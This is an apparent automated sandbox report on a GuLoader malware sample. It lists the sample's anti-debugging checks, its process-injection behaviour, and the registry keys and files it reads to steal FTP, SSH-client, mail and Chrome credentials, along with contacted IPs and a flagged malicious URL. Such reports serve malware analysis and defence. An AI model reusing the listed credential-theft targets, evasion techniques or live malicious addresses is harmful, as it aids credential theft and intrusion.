Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD2EAE mov eax, dword ptr fs:[00000030h] 0_2_02AD2EAE
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD39B1 mov eax, dword ptr fs:[00000030h] 0_2_02AD39B1
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD89F6 mov eax, dword ptr fs:[00000030h] 0_2_02AD89F6
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD7D38 mov eax, dword ptr fs:[00000030h] 0_2_02AD7D38
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD7714 mov eax, dword ptr fs:[00000030h] 0_2_02AD7714
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD577E mov eax, dword ptr fs:[00000030h] 0_2_02AD577E
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD6813 LdrInitializeThunk, 0_2_02AD6813

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe 'C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe' Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.217.168.78
 drive.google.com United States
15169 GOOGLEUS false
136.243.159.53
 unknown Germany
24940 HETZNER-ASDE true
172.217.168.65
 googlehosted.l.googleusercontent.com United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
drive.google.com 172.217.168.78 true
googlehosted.l.googleusercontent.com 172.217.168.65 true
doc-0c-5o-docs.googleusercontent.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://doc-0c-5o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v3agssaj4m1da9uvntfjbdrnuso7gs0u/1631701050000/14094524972347321979/*/16hJeQVa7vECqqXwxmeW5i0BX_hPCAorF?e=download false
    		high
    http://136.243.159.53/~element/page.php?id=121 true
    • 7%, Virustotal, Browse
    • Avira URL Cloud: safe
    		 unknown